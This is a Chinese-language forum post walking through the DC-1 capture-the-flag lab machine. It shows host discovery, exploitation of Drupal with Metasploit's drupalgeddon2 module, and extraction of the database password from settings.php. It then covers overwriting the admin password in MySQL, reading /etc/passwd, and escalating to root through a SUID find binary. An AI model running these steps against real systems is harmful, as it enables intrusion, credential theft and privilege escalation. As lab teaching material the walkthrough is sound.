×
热搜词

QQ登录

只需一步,快速开始

DC-1靶机渗透教程

DC-1

本机IP地址:192.168.138.128
001.png
设置中,网络适配器调成NAT

Netdiscover -r 192.168.138.128(或192.168.138.1/24) 扫描靶机地址
002.png


靶机IP192.168.138.129

扫描靶机存活端口
Nmap  -sV -p- 192.168.138.129
003.png
可以看到http服务的80端口
查看80端口
004.png
返回kali终端
输入whatweb -v 192.168.138.129 (扫描一些详细信息)
扫描完成后
再输入Msfconsole
进入msf6
005.png
进入msfconsole
输入下面指令进入模块
msf6 >  use exploit/unix/webapp/drupal_drupalgeddon2exploit→漏洞模块攻击的代码)
后续输入
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >  show options
如下
006.png
再输入
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >  show payloads
007.png
再输入
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.138.129
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
008.png
sysinfo
shell
Id
python -c 'import pty; pty.spawn("/bin/bash")'  必背
009.png
输入ls查看所有文件
ls
010.png
发现flag1值啦
输入
cat flag1.txt      cat意思“打开”)
打开flag1.txt文件瞅瞅就行了



find . -name "set*"
find . -name "set*"                                                                                             
./sites/default/settings.php                                                                                    
cat ./sites/default/settings.php
011.png
mysql -udbuser -pR0ck3t
进入数据库
012.png
mysql> show databases;
mysql> use drupaldb
mysql> shop tables;
mysql> show tables;
013.png
mysql> select * from user
mysql> select * from users\G;
014.png


mysql> exit
find . -name "*hash*"
./scripts/password-hash.sh

015.png
  ./scripts/password-hash.sh 123456
016.png
再进数据库
mysql> use drupaldb
mysql> update users set pass=’略’where name="admin";
017.png
flag3在网站中,使用修改后的密码登录网站后就能发现。


cat /etc/password
cat /etc/passwd
cd /home/flag4
ls
cat flag4.txt
flag4也就出来了


接下来使用find提权


find / -perm -u-s -type f 2>/dev/null
018.png

find ./ -exec /bin/sh

获得root权限
查看root目录中的thefinalflag.txt

End

019.png




度仙门网 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
2、本站所有主题由该帖子作者发表,该帖子作者与度仙门网享有帖子相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和度仙门网的同意
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、度仙门网管理员和版主有权不事先通知发贴者而删除本文

帖子地址: 

玄元一墨

写了 246 篇文章,拥有下品灵石 9544 枚,中品灵石 11421 枚,上品灵石 10002 枚,被 4 人关注

欢迎访问度仙门网!请在论坛右上角的个人设置中修改你的个性签名!
踩
回复

使用道具

您需要登录后才可以回帖 登录 | 立即注册
B Color Link Quote Code Smilies

成为第一个吐槽的人

Copyright © 2018-, Duxian studio.

返回顶部